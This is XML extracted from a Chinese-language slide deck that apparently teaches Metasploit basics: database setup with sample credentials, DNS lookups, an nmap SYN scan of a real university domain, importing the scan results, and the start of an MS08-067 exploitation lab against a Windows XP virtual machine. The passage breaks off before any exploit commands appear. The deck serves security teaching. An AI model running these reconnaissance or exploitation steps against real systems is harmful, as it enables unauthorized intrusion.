          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>#创建一个postgresql数据库账户</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Shape 482"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="626426" y="3924299"/>
            <a:ext cx="278511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create user root –P</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Shape 483"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580727" y="4425949"/>
            <a:ext cx="551180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接着，会提示输入密码，然后确认密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="Shape 484"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606424" y="5011234"/>
            <a:ext cx="1878379"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>#创建数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="Shape 485"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665792" y="5596521"/>
            <a:ext cx="4652646"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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>createdb --owner=root nexp_db</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="Shape 486"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666496" y="6105607"/>
            <a:ext cx="8281353"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owner参数指定数据库的所有者，后一个参数为数据库名称</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="Shape 487"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606423" y="6553200"/>
            <a:ext cx="445357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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>#然后退出进入MSF连接数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Shape 488"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601026" y="1828800"/>
            <a:ext cx="4648519"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sudo  systemctl start postgresql</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489" name="Shape 489"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588674" y="2286000"/>
            <a:ext cx="286638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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>#切换到postgresql</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Shape 490"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617213" y="7092950"/>
            <a:ext cx="5938839"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db_connect root:toor@localhost/nexp_db</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="Shape 491"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="570636" y="7926971"/>
            <a:ext cx="10337801"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500"/>
            </a:pPr>
            <a:r>
              <a:t>连接成功后会提示：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>[-] postgresql already connected to msf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>[-] Run db_disconnect first if you wish to connect to a different database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Shape 492"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572611" y="685799"/>
            <a:ext cx="9040178"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进入msfconsole后可配置数据库来更方便更快速的查询各种模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide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4" name="Shape 494"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572610" y="457199"/>
            <a:ext cx="11747404" cy="101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500"/>
            </a:pPr>
            <a:r>
              <a:t>msfconsole支持系统所有命令，在终端中输入</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>help</a:t>
            </a:r>
            <a:r>
              <a:t>可以查看“Core Commands”、“Database Backend Commands”、“Exploit Commands”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="495" name="image62.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="857266" y="1759425"/>
            <a:ext cx="11068034" cy="7403220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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9" name="Shape 169"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787176" y="1136649"/>
            <a:ext cx="3429446" cy="76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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>DNS服务器查询</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Shape 170"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="986790" y="2107424"/>
            <a:ext cx="9474505" cy="1397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500"/>
            </a:pPr>
            <a:r>
              <a:t>除了whois查询之外，我们还可以通过host命令来查询dns服务器，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>host [-aCdlriTwv] [-c class] [-N ndots] [-t type] [-W time]</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>            [-R number] [-m flag] hostname [server]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="171" name="image7.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079500" y="5136062"/>
            <a:ext cx="10099152" cy="2014350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Shape 172"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133316" y="7562849"/>
            <a:ext cx="5988368" cy="1701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500"/>
            </a:pPr>
            <a:r>
              <a:t>从图中可以看到有3个dns服务器，分别为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>dns1.hdu.edu.cn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>dns2.hdu.edu.cn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>dns2.hdu.edu.cn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Shape 173"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850899" y="4250392"/>
            <a:ext cx="2514601"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700"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>查询域名服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide7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7" name="Shape 497"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3538404" y="574212"/>
            <a:ext cx="6275084" cy="76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3700">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>MSF集成的几种漏洞扫描组件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Shape 498"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565639" y="1854200"/>
            <a:ext cx="996417"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Nmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="Shape 499"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521810" y="2870199"/>
            <a:ext cx="11488899" cy="193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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Nmap适用于Winodws、Linux、Mac等操作系统。它用于主机发现、端口发现或枚举、服务发现，检测操作系统、硬件地址、软件版本以及脆弱性的漏洞。Metasploit Framework平台集成了Nmap组件。通常在对目标系统发起攻击之前需要进行一些必要的信息收集，如获取网络中的活动主机、主机开放的端口等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="Shape 500"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530825" y="5587999"/>
            <a:ext cx="1243845"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Nessus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="Shape 501"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569976" y="6334587"/>
            <a:ext cx="11864848" cy="193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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Nessus是当前使用最广泛的漏洞扫描工具之一。Nessus采用client/sever模式，服务器端负责进行安全检查，客户端用来配置管理服务器端。在服务端还采用了plug-in的体系，允许用户加入执行特定功能的插件，这插件可以进行更快速和更复杂的安全检查。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide7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3" name="Shape 503"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572610" y="685799"/>
            <a:ext cx="346583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使用nmap进行端口扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504" name="Shape 504"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838384" y="1589897"/>
            <a:ext cx="7670429"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>nmap -sS -v www.hdu.edu.cn -oX Desktop/out.xml</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="505" name="image63.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1169273" y="2417796"/>
            <a:ext cx="9676528" cy="5942478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide7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7" name="Shape 507"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572610" y="685799"/>
            <a:ext cx="6011229"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914400">
              <a:defRPr sz="2500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>通过db_import命令导入已保存的扫描结果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="Shape 508"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1151681" y="1310497"/>
            <a:ext cx="4224437"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>db_import Desktop/out.xml</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="509" name="image64.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="985129" y="2368556"/>
            <a:ext cx="10495671" cy="1485392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="Shape 510"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="559911" y="4431454"/>
            <a:ext cx="7858126"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914400">
              <a:defRPr sz="2500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>使用hosts命令查看包含在XML格式的扫描结果中的对象</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="511" name="image65.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="888130" y="5567765"/>
            <a:ext cx="10495673" cy="2168054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide7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3" name="Shape 513"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572611" y="685799"/>
            <a:ext cx="8281353"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914400">
              <a:defRPr sz="2500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>使用services命令详细查看下列开放端口的相关服务信息。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="Shape 514"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521810" y="5321299"/>
            <a:ext cx="7240906"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914400">
              <a:defRPr sz="2500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>使用notes命令按扫描结果显示的端口导出详细信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="515" name="image65.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1114864" y="6310831"/>
            <a:ext cx="10144832" cy="2095583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="516" name="image66.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1528341" y="1389096"/>
            <a:ext cx="9064416" cy="3501473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide7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8" name="Shape 518"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2712903" y="561512"/>
            <a:ext cx="7969524" cy="76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3700">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>实例演示MSF入侵WinXP(ms_08067)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="Shape 519"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552448" y="1638299"/>
            <a:ext cx="74930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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>环境</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="520" name="Shape 520"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="806450" y="2311399"/>
            <a:ext cx="2920683"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500"/>
            </a:pPr>
            <a:r>
              <a:t>Windows XP SP3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>IP：172.16.211.129</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="521" name="image67.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="625858" y="3801876"/>
            <a:ext cx="11753085" cy="5192000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="Shape 522"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5042058" y="2311399"/>
            <a:ext cx="2920683"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500"/>
            </a:pPr>
            <a:r>
              <a:t>Kali Linux </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>IP：172.16.211.128</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="Shape 523"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3854449" y="2413000"/>
            <a:ext cx="5715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p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 525"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="932972" y="1295400"/>
            <a:ext cx="11138855"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3" indent="685800" algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>漏洞名称:Windows Server服务RPC请求缓冲区溢出漏洞（MS08-067）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>此安全更新解决了服务器服务中一个秘密报告的漏洞。如果用户在受影响的系统上收到特制的 RPC 请求，则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上，攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="Shape 526"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539750" y="711199"/>
            <a:ext cx="1384300"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>实验原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527" name="Shape 527"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400048" y="4775199"/>
            <a:ext cx="138430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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>实验过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="Shape 528"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="5511798"/>
            <a:ext cx="8230112"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500"/>
            </a:pPr>
            <a:r>
              <a:t>在msfconsole使用</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
